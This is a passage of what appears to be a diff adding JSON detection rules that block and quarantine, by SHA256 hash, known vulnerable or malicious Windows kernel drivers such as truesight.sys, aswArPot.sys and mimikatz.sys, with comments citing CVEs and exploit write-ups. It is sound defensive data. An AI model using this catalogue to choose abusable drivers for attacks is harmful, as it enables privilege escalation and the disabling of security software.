"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618586Z", + "creation_date": "2026-03-23T11:45:29.618588Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b38c075ba6523502dfd39ed10757db58234a1c84d4952b65e30b4a8679bfcca", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24680372-aa41-510d-9921-25dec8eed65f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970262Z", + "creation_date": "2026-03-23T11:45:29.970264Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970269Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fca5f90ce2b210e6026cbf6f2c281fe17a08ddb2e936200847823ef83eaab1eb", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2470a35c-3229-52c2-a468-181abcf1ce3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619303Z", + "creation_date": "2026-03-23T11:45:29.619305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619310Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "248cc669-35e5-5018-95e0-082bfc13355e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831621Z", + "creation_date": "2026-03-23T11:45:30.831623Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831628Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d1b43ce1b90845a1a4af7c1ece3d2d69c84c0a7e83d0f59c880756bb098fca4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "248fe219-024e-5aed-9ce7-96f3ef8f2b21", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614472Z", + "creation_date": "2026-03-23T11:45:29.614474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24b20cae-35a9-5bd5-961a-772ebf23b226", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827348Z", + "creation_date": "2026-03-23T11:45:31.827350Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad13e0a80edc24ae3c49b2c525cceef5aa73011c0aa8f09a15083c5a16229195", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24b525fb-240b-526f-b856-c4a76d75d5ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 
1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148723Z", + "creation_date": "2026-03-23T11:45:31.148725Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148730Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bb22f60323c32d2b8b85c8d31aae9ea27e9a61c232b5d0cbda4893632fe513b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24c22ac9-3ac8-52a0-be4b-1d8d7776ac6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832040Z", + "creation_date": "2026-03-23T11:45:30.832042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "67cdfbe63f6dcdd24e4e2531cb082990d5c062f025dd05e711449eb38f4485f3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24c702b6-536d-54f8-a38a-0087eddaaed6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613666Z", + "creation_date": "2026-03-23T11:45:29.613668Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24ce6ed1-45ee-52e5-b799-612c9d1ad586", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467267Z", + "creation_date": "2026-03-23T11:45:30.467271Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89ec70089d61eccb9021edc6f1b50a9ef99196467a011e1dc7d0325aa51b7dff", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24d85f30-810c-5c37-ad2a-7e5133f003d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614076Z", + "creation_date": "2026-03-23T11:45:29.614078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfcf32f5662791f1f22a77acb6dddfbc970fe6e99506969b3ea67c03f67687ab", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"24e0b9c0-8a84-54dc-bfae-d67572c60c98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157153Z", + "creation_date": "2026-03-23T11:45:31.157155Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca6955adf0cb9b059f228d1460b2647b34654a0bf4391ac874c3ec02aa86b74c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24f21b1e-feb2-5414-8ac1-d162c9b17a5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618514Z", + "creation_date": "2026-03-23T11:45:29.618516Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.618522Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91ee89520105ccbceca6ee0e34070f28c8dc5a3d73ec65f384da5da4f2a36dc0", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24f2ba77-8d4b-5fdf-9944-43336a97d16a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143742Z", + "creation_date": "2026-03-23T11:45:32.143744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143750Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf1264cf5b9ca687a447a5021394db27eecf31f009185deb634b32f7ed49f620", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24f33bf0-bef2-58cb-bf4a-a3bca138d75a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158897Z", + "creation_date": "2026-03-23T11:45:31.158899Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24179779724d229c5a0a0a9ebd442936882496556ccb9ab5943aa9bfc63cf2a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24f4a8d7-6e98-5ec3-9b1c-9ba19d60ff76", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812011Z", + "creation_date": "2026-03-23T11:45:31.812012Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "049b22ea9712994036b3240d026d85d9c4699ead7c593e66e5f845c51cc7e6d5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24f821ab-2000-5aa8-83b9-0d2a4f4e8921", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461971Z", + "creation_date": "2026-03-23T11:45:30.461975Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "accb1a6604efb1b3ce9345c9fd62fe717a84c3e089e09c638e461df89193ef01", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2506272d-ec09-5199-8431-9e6d5123a475", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143613Z", + "creation_date": "2026-03-23T11:45:32.143615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1698ba7eeee6ff9272cc25b242af89190ff23fd9530f21aa8f0f3792412594f3", + "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2509a2ea-ece4-52af-9716-dcb806fef5ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617695Z", + "creation_date": "2026-03-23T11:45:29.617697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617702Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6", + "comment": "Cheat Engine dangerous driver (aka dbk64.sys) 
[https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "250af9c6-1320-57aa-aaa1-21d48ec88415", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968367Z", + "creation_date": "2026-03-23T11:45:29.968369Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968375Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "995284d05f947e2db58ece30b6d61653a2b94b2c337e5c75ca8315793e0b3955", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "250bb6a7-a152-5de2-8bdf-c00186555d48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146744Z", + "creation_date": "2026-03-23T11:45:31.146746Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146751Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a71944dd57948f2cda64fac2f9407f099dbd7744f5bdd7fe9500703af0fb553", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "250c1b07-af0f-5c58-b42d-d7ae7d6e8a85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486105Z", + "creation_date": "2026-03-23T11:45:31.486109Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486119Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd487838b9b0eb272db9dd09b40ef5826b523f9f48d44130b4c1a53ed2182323", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"250f1f91-222b-50fe-8ae9-a4086d2a5040", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145236Z", + "creation_date": "2026-03-23T11:45:31.145238Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145243Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1726cc742dcad64d0993f833b26f7c314fb4b3ee999e7cdc371bde6dec26afef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "251585db-48a8-5da7-b2c3-372879427e9e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495779Z", + "creation_date": "2026-03-23T11:45:31.495781Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.495786Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbed48e78c6e4a9c190fc7b98b33b0b61890d8eaacc3df3c9f97f6f3430f8a8c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "251f9569-4927-597e-8cf2-ea160a03498c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833119Z", + "creation_date": "2026-03-23T11:45:30.833123Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, 